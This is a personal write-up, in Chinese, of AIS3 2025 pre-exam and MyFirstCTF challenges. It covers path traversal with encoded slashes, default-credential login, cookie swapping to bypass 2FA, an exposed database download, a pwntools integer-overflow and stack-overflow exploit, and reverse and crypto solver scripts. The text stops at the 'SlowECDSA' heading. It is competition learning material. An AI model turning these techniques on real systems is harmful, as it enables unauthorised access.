2025-08-31

AIS3 2025 pre-exam & myfirst ctf write up

[mfctf(o)/pre-exam(x)] 代表的是在mfctf有解出來但是pre-exam沒解

pre-exam排名73

mfctf排名7

ㄏㄏ只比mfctf多300分, 可以再廢一點

misc [mfctf(o)/pre-exam(x)]

Welcome

已經給了, 不過不能複製貼上我直接手打

flag : AIS3{Welcome_And_Enjoy_The_CTF_!}

用google翻譯用出來的結果w

Ramen CTF

這題有給一個圖片, 可以發現他有一個發票

拿去掃之後可以發現她的發票號碼為MF-16879911, 另外可以發現他的隨機碼是7095, 日期是2025/4/13, 所以把以上線索拿去https://www.einvoice.nat.gov.tw/portal/btc/audit/btc601w/search查就可以查到是哪一間也可以知道吃啥

題目說flag的format是AIS3{google_map上的店家名稱:跟他吃的東西}
所以我把這個地址拿去google查發現他跟發票上面的名字完全不一樣==

最後可以組成一下flag
flag : AIS3{樂山溫泉拉麵:蝦拉麵}
~~至於為啥沒有蔬食拉麵我也不知道~~

AIS3 Tiny Server - Web / Misc

這題真的超簡單不知道為啥沒什麼人解
~~不過我也是靠這題在保名次的~~
這題進來就是一個介面, 下面有說明, 似乎跟path traversal有關

然後我就到把index.html拿掉就發現看起來可以lfi

所以我就一直往上一層目錄走(要用%2f代替/才不會被返回到原本的地方)
到根目錄可以發現有一個readable_flag_<random>的檔案

去讀它就有flag了

flag : AIS3{tInY_WeB_S3RV3R_wi7H_FILe_BrOWs1nG_As_@_FeatUR3}

Web [mfctf(o)/pre-exam(x)]

Tomorin db 🐧

這題跟上面的misc一樣的道理

觀察原始碼發現他如果按下flag就會帶我到那個網址的地方, 但是flag也是真的flag, 他只是被重新導向而已

所以我就用了…%2f來做path traversal

flag : AIS3{G01ang_H2v3_a_c0O1_way!!!_Us3ing_C0NN3ct_M3Th07_L0l@T0m0r1n_1s_cute_D0_yo7_L0ve_t0MoRIN?}

這題其實是白箱, ~~但是我是在黑箱的情況下打出來的~~
先說一下我的解法
首先我是先發現他可以使用admin/admin登入(~~我也不知道為啥~~)

登入之後會看到一個要輸入2fa代碼的介面, 但是現在有一個問題就是我不知道admin的2fa是甚麼, 直接進去dashboard.php也會被redirect到2fa.php
, 這時候我就想到一個方法是用先進去guest的dashboard.php然後在使用admin的cookie拿到flag
至於怎麼做的…
我是先用burpsuite先登入guest進去她的dashboard.php

然後再用我原本登入admin的cookie貼到已經以guest身分進入dashboard.php的cookie

然後就拿到flag了

flag : AIS3{1.Es55y_SQL_1nJ3ct10n_w1th_2fa_IuABDADGeP0}
還有另外一個方法更簡單, 但是是在有給原始碼的情況下
可以看到docker-compose.yml除了其他的.php還有一個是users.db

只要在網址後面輸入users.db就會把database給下載下來
然後再用vs code裡面的模組去看database就可以看到admin的2fa code

把他複製貼上就可以拿到flagㄌ

pwn [mfctf(x)/pre-exam(o)]

Welcome to the World of Ave Mujica🌙

這題只能說我眼幹沒有看到read_int8()的部分…看到之後再5分鐘內就解出來了
看到main function的時候可以發現他的輸出都是一堆unicode不過不影響

我們的目標是跳到這裡去拿到shell, 嗯對就是典型的buf

進去之後要先輸入yes, 第二步是他會叫你輸入你要的名字長度

但是因為他在read_int8()有做長度限制, 所以最高只能輸入127, 導致你不能overflow到win function

不過可以看到他沒有規定最小值, 所以可以輸入-1觸發integer overflow

有了這些線索之後就可以開始寫腳本了ww
最後的exploit:

from pwn import *

r = remote('chals1.ais3.org', 60268)

context.log_level = 'debug'

context.arch = 'amd64'

win = 0x401256

ret = 0x40101a

payload = b'a'*160 + p64(ret) + p64(win)

r.recvuntil(b'?\n')

r.sendline(b'yes')

r.recvuntil(b': ')

r.sendline(b'-1')

r.sendline(payload)

r.interactive()

flag : AIS3{Ave Mujica🎭將奇蹟帶入日常中🛐(Fortuna💵💵💵)…Ave Mujica🎭為你獻上慈悲憐憫✝️(Lacrima😭🥲💦)…_d3513aab63a5f2da52390b8fdd9fac04}

reverse [mfctf(x)/pre-exam(o)]

AIS3 Tiny Server - Reverse

在sub_1E20有一個加密flag的地方, 逆向他就好
exploit:

v8 = [
    1480073267,
    1197221906,
    254628393,
    920154,
    1343445007,
    874076697,
    1127428440,
    1510228243,
    743978009,
    54940467,
    1246382110
]

v7 = b"rikki_l0v3"
v2 = 51
v3 = 114

import struct
v8_bytes = bytearray()
for val in v8:
    v8_bytes += struct.pack("<I", val) 

for i in range(44):
    v8_bytes[i] = v2 ^ v3
    v2 = v8_bytes[i+1] if i+1 < len(v8_bytes) else 0
    v3 = v7[(i+1) % 10]

print(v8_bytes[:45].decode('ascii'), end='')
print('}')

flag : AIS3{w0w_a_f1ag_check3r_1n_serv3r_1s_c00l!!!}

web flag checker [mfctf(x)/pre-exam(o)]

這題的話用CTRL+U可以看到他有一個index.js可以看, 仔細看會發現裡面會有一個檔案叫index.wasm輸入在網址後面就可以下載下來
接下來就要下載工具wabt, 它是用來decompiler wasm file的工具

載好build好之後就可以去decompiler他

最後把decompiler的結果丟給ai讓他去逆向出flag就好了

def ror(val, r_bits, max_bits=64):
    return ((val >> r_bits) | (val << (max_bits - r_bits))) & (2**max_bits - 1)

def extract_shifts(magic, count=5):
    shifts = []
    for i in range(count):
        shifts.append((magic >> (6 * i)) & 0x3F)
    return shifts

expected = [
    7577352992956835434,
    7148661717033493303,
    -7081446828746089091 & (2**64 - 1),
    -7479441386887439825 & (2**64 - 1),
    8046961146294847270,
]

magic = -39934163 & (2**32 - 1)
shifts = extract_shifts(magic)

parts = []
for val, shift in zip(expected, shifts):
    original = ror(val, shift)
    parts.append(original.to_bytes(8, 'little'))

flag = b''.join(parts)
print("Flag:", flag.decode('utf-8'))

flag : AIS3{W4SM_R3v3rsing_w17h_g0_4pp_39229dd}

crypto [mfctf(x)/pre-exam(o)]

我只有cry的部分😢gemini pro才是mvp

Stream

exploit:

import math

# 最後一個輸出
cf_hex = "0x1a95888d32cd61925d40815f139aeb35d39d8e33f7e477bd020b88d3ca4adee68de5a0dee2922628da3f834c9ada0fa283e693f1deb61e888423fd64d5c3694"
cf_int = int(cf_hex, 16)

# 計算 isqrt
r_guess = math.isqrt(cf_int)

# 檢查位元長度 (256位是合理的)
print(f"R_guess bit length: {r_guess.bit_length()}")

# 計算 F_guess
f_guess_int = cf_int ^ (r_guess**2)

# 轉換為 bytes
f_bytes = f_guess_int.to_bytes((f_guess_int.bit_length() + 7) // 8, 'big')

print(f_bytes)

flag : AIS3{no_more_junks…plz}

Random_RSA


import gmpy2 # Still used for is_prime, powmod, gcd
from Crypto.Util.number import long_to_bytes

# --- Tonelli-Shanks Algorithm Implementation ---
def legendre_symbol(a, p):
    """ Computes the Legendre symbol (a/p) """
    ls = gmpy2.powmod(a, (p - 1) // 2, p)
    if ls == p - 1:
        return -1
    return int(ls)

def tonelli_shanks(n, p):
    """
    Solves x^2 = n (mod p) using Tonelli-Shanks algorithm.
    p must be an odd prime.
    Returns one solution x, or None if no solution exists.
    """
    n = n % p
    if n == 0:
        return 0
  
    if legendre_symbol(n, p) != 1:
        return None  # n is not a quadratic residue mod p

    if p % 4 == 3:
        x = gmpy2.powmod(n, (p + 1) // 4, p)
        return int(x)

    # Decompose p-1 = Q * 2^S such that Q is odd
    Q = p - 1
    S = 0
    while Q % 2 == 0:
        Q //= 2
        S += 1

    if S == 1: # This is equivalent to p % 4 == 3, handled above
        x = gmpy2.powmod(n, (p + 1) // 4, p)
        return int(x)

    # Find a quadratic non-residue z mod p
    z = 2
    while legendre_symbol(z, p) != -1:
        z += 1
  
    c = gmpy2.powmod(z, Q, p)
    R = gmpy2.powmod(n, (Q + 1) // 2, p)
    t = gmpy2.powmod(n, Q, p)
    M_loop = S # In some literature M denotes S, using S_loop to avoid confusion with challenge's M

    while True:
        if t == 0: return 0 # Should not happen if legendre_symbol(n,p)==1 and n!=0
        if t == 1: return int(R)
      
        # Find smallest i such that t^(2^i) = 1 (mod p)
        i = 0
        temp_t = t
        while temp_t != 1 and i < M_loop : # i must be < M_loop
            temp_t = gmpy2.powmod(temp_t, 2, p)
            i += 1
      
        if i == 0: # Should mean t was 1 already
             return int(R)
        if i == M_loop: # Should not happen if legendre symbol was 1
            return None 


        b = gmpy2.powmod(c, gmpy2.powmod(2, M_loop - i - 1, p -1), p) # Exponent for c is 2^(M_loop-i-1)
        R = (R * b) % p
        t = (t * b * b) % p
        c = (b * b) % p
        M_loop = i
# --- End of Tonelli-Shanks ---


# Given values from the output
h0 = 2907912348071002191916245879840138889735709943414364520299382570212475664973498303148546601830195365671249713744375530648664437471280487562574592742821690
h1 = 5219570204284812488215277869168835724665994479829252933074016962454040118179380992102083718110805995679305993644383407142033253210536471262305016949439530
h2 = 3292606373174558349287781108411342893927327001084431632082705949610494115057392108919491335943021485430670111202762563173412601653218383334610469707428133
M = 9231171733756340601102386102178805385032208002575584733589531876659696378543482750405667840001558314787877405189256038508646253285323713104862940427630413
n = 20599328129696557262047878791381948558434171582567106509135896622660091263897671968886564055848784308773908202882811211530677559955287850926392376242847620181251966209002883852930899738618123390979377039185898110068266682754465191146100237798667746852667232289994907159051427785452874737675171674258299307283
e = 65537
c = 13859390954352613778444691258524799427895807939215664222534371322785849647150841939259007179911957028718342213945366615973766496138577038137962897225994312647648726884239479937355956566905812379283663291111623700888920153030620598532015934309793660829874240157367798084893920288420608811714295381459127830201

# Step 1: Recover LCG parameters a_lcg, b_lcg
diff10 = (h1 - h0 + M) % M
diff21 = (h2 - h1 + M) % M

if diff10 == 0:
    print("Error: h1 - h0 is zero, cannot compute inverse.")
    exit()

inv_diff10 = gmpy2.powmod(diff10, -1, M)
a_lcg = (diff21 * inv_diff10) % M
b_lcg = (h1 - a_lcg * h0 + M) % M


# Step 2 helper: genPrime verification function
def check_genprime_iterations(p_val_start_for_q, q_val_target, local_a_lcg, local_b_lcg, local_M, expected_j_rng_calls):
    current_rng_input = p_val_start_for_q 
    current_rng_output = p_val_start_for_q 

    for k_rng_call in range(1, expected_j_rng_calls + 1):
        current_rng_output = (local_a_lcg * current_rng_input + local_b_lcg) % local_M
        is_current_prime = gmpy2.is_prime(current_rng_output)

        if k_rng_call < expected_j_rng_calls: 
            if is_current_prime:
                return False 
        else: 
            if is_current_prime and current_rng_output == q_val_target:
                return True
            else:
                return False
        current_rng_input = current_rng_output 
    return False


# Step 3: Iterate for j (number of LCG steps from p to q)
A_curr = int(a_lcg) 
B_curr = int(b_lcg) 

MAX_J_ITERATIONS = 1000 

for j_iter in range(1, MAX_J_ITERATIONS + 1):
    if j_iter > 1: 
        A_curr = (a_lcg * A_curr) % M 
        B_curr = (a_lcg * B_curr + b_lcg) % M
  
    C_n_val = (-n % M + M) % M

    p_candidates_list = []
    if A_curr == 0: 
        if B_curr != 0:
            if gmpy2.gcd(B_curr, M) == 1: 
                inv_B_curr = gmpy2.powmod(B_curr, -1, M)
                p_cand_val = (C_n_val * inv_B_curr) % M
                p_candidates_list.append(p_cand_val)
    else: 
        D_val = (B_curr**2 - 4 * A_curr * C_n_val) % M
        D_val = (D_val + M) % M 

        s_sqrt = tonelli_shanks(D_val, M) # Using custom Tonelli-Shanks
          
        if s_sqrt is None: 
            continue 
      
        s1_sqrt = s_sqrt
        s2_sqrt = (M - s1_sqrt) % M

        modval_2A_curr = (2 * A_curr) % M
        if modval_2A_curr == 0: continue 
      
        inv_2A_curr = gmpy2.powmod(modval_2A_curr, -1, M)
          
        p_cand1 = ((-B_curr + s1_sqrt) * inv_2A_curr) % M
        p_cand2 = ((-B_curr + s2_sqrt) * inv_2A_curr) % M
      
        p_candidates_list.append(p_cand1)
        if p_cand1 != p_cand2: 
            p_candidates_list.append(p_cand2)
  
    for p_val_cand_mod_M_iter in p_candidates_list:
        p_actual_val = int(p_val_cand_mod_M_iter)

        if p_actual_val == 0: continue 
        if n % p_actual_val != 0: continue 
      
        term_for_L_val = (A_curr * pow(p_actual_val, 2) + B_curr * p_actual_val - n)
      
        if term_for_L_val % M != 0:
            continue

        L_div_M_val = term_for_L_val // M 

        if p_actual_val == 0: continue # Should have been caught already
        if L_div_M_val !=0 and L_div_M_val % p_actual_val != 0 :
            continue
        elif L_div_M_val == 0: # K is 0
            pass


        q_actual_val = n // p_actual_val

        if not (gmpy2.is_prime(p_actual_val) and gmpy2.is_prime(q_actual_val)):
            continue
      
        if check_genprime_iterations(p_actual_val, q_actual_val, a_lcg, b_lcg, M, j_iter):
            phi_val = (p_actual_val - 1) * (q_actual_val - 1)
            if gmpy2.gcd(e, phi_val) != 1: 
                print("Error: e is not coprime to phi.")
                continue

            d_sol_val = gmpy2.powmod(e, -1, phi_val)
            m_int_val = gmpy2.powmod(c, d_sol_val, n)
          
            try:
                flag_bytes = long_to_bytes(int(m_int_val))
                print(f"Flag: {flag_bytes.decode()}")
            except Exception as err:
                print(f"Error decoding flag: {m_int_val}, {err}")
            exit()

flag : AIS3{1_d0n7_r34lly_why_1_d1dn7_u53_637pr1m3}

SlowECDSA

解題流程: